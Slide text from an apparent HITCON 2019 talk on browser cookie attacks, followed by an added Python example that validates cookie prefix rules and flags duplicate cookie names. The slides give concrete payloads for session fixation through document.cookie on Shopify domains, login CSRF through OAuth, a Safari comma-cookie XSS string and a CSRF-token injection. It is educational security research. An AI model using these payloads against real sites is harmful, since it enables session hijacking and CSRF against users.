The Cookie Monster in Our Browsers
@filedescriptor
HITCON 2019
History
• The Dark Age: basic syntax
• RFC 6265 (obsoletes RFC 2109): more attributes
• RFC6265bis: Cookie Prefixes, Same-site Cookies, Strict Secure Cookies
Attribute Flag
👀 sub.example.com   👀 sub.of.sub.example.com

Subdomains to subdomains
sub.example.com: Set-Cookie: foo=bar; domain=.example.com
👀 example.com   👀 sub.of.sub.example.com

Current domain
sub.example.com: Set-Cookie: foo=bar;
👀 example.com   👀 sub.of.sub.example.com
Dot or no Dot?
• There is no difference (old RFC style vs new RFC style)
https://example.com/aaa…aaa   https://twitter.com/#b
https://example.com/aaa…aaa   https://twitter.com/#c

GET / HTTP/1.1
[...]
Cookie: ev_redir_a=aaa...aaa; ev_redir_b=aaa...aaa; ev_redir_c=aaa...aaa   } 8kB+
Shared domains are vulnerable by design
e.g. github.io
Public Suffix List
• Community curated
https://google.com/oauth?client_id=example
https://example.com
iframe.contentWindow.location.href
https://example.com/oauth/callback?code=123
Path & HttpOnly
POST /admin HTTP/1.1
[...]
Cookie: csrf_token=foo; csrf_token=bar
authenticity_token=attacker-known
Reality
Name           Value        Domain
_twitter_sess  original
_twitter_sess  attacker’s   .twitter.com
“2. The user agent SHOULD sort the cookie-list in the following order:”
“Practical user agent implementations have limits on the number and size of cookies that they can store. General-use user agents SHOULD provide each of the following minimum capabilities:
o At least 4096 bytes per cookie (as measured by the sum of the length of the cookie's name, value, and attributes).”
document.cookie='_master_udr=attackers;path=/admin/oauth'
Login “CSRF”
https://attacker.myshopify.com/admin/oauth/authorize?client_id=editor
→ https://script-editor.shopifycloud.com/oauth/callback?code=attackers

Re-login victim
https://victim.myshopify.com/admin/oauth/authorize?client_id=editor
→ https://script-editor.shopifycloud.com/oauth/callback?code=victims
Session Fixation
Forcing attacker’s session cookie with a subdomain
XSS
https://script-editor.shopifycloud.com
document.cookie='_flow_session=attackers;domain=.shopifycloud.com'
https://victim.myshopify.com/admin/oauth/authorize?client_id=flow
HTTP/1.1 200 OK
[...]
Set-Cookie: realm=hotmail.com;, ClientId='-alert(2)-'

GET / HTTP/1.1
[...]
Cookie: realm=hotmail.com; ClientId='-alert(2)-'   ← Safari sets 2 cookies

window.clientId = ''-alert(2)-'';
CSRF Cookie Injection
Server accepting comma-separated cookies
“For backward compatibility, the separator in the Cookie header is semi-colon (;) everywhere. A server SHOULD also accept comma (,) as the separator between cookie-values for future compatibility.”

__utmz=123456.123456789.11.2.utmcsr=blackfan.ru|utmccn=(referral)|utmcct=/r/,m5_csrf_tkn=x
→ m5_csrf_tkn=x
Defense
Cookie Prefixes
• Cookies prefixed with __Host- cannot have a Domain attribute
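As an added example (written for this page, not the speaker's code), the two server-side checks a defender would want for the duplicate csrf_token case in the Path & HttpOnly slide and for the __Host- prefix rule above: a Set-Cookie validator that applies the prefix rules, and a Cookie-header scan that flags any name appearing more than once. Cookie names, values and hosts in the test inputs are constructed.

```python
# Added example, not from the talk: defensive checks for two issues above.
# - validate_set_cookie() applies the __Host- / __Secure- prefix rules the
#   Defense slides describe (Secure required; __Host- forbids Domain and
#   requires Path=/), the way a conforming browser checks before storing.
# - duplicate_cookie_names() flags a Cookie header in which one name occurs
#   more than once (csrf_token=foo; csrf_token=bar), so a server can refuse
#   the request instead of guessing which copy is the legitimate one.

def parse_set_cookie(header):
    """Split 'name=value; Attr=val; Flag' into (name, value, {attr: val})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()   # bare flags map to ""
    return name.strip(), value, attrs


def validate_set_cookie(header):
    """Return the prefix-rule violations for one Set-Cookie header line
    (an empty list means the cookie would be accepted)."""
    name, _, attrs = parse_set_cookie(header)
    problems = []
    prefixed = name.startswith("__Host-") or name.startswith("__Secure-")
    if prefixed and "secure" not in attrs:
        problems.append("missing Secure")
    if name.startswith("__Host-"):
        if "domain" in attrs:
            problems.append("Domain attribute not allowed")
        if attrs.get("path") != "/":
            problems.append("Path must be /")
    return problems


def duplicate_cookie_names(cookie_header):
    """Names that appear more than once in a Cookie request header."""
    counts = {}
    for pair in cookie_header.split(";"):
        name = pair.strip().partition("=")[0]
        if name:
            counts[name] = counts.get(name, 0) + 1
    return sorted(n for n, c in counts.items() if c > 1)


if __name__ == "__main__":
    print(validate_set_cookie("__Host-sess=abc; Secure; Path=/; Domain=.example.com"))
    print(duplicate_cookie_names("csrf_token=foo; csrf_token=bar"))
```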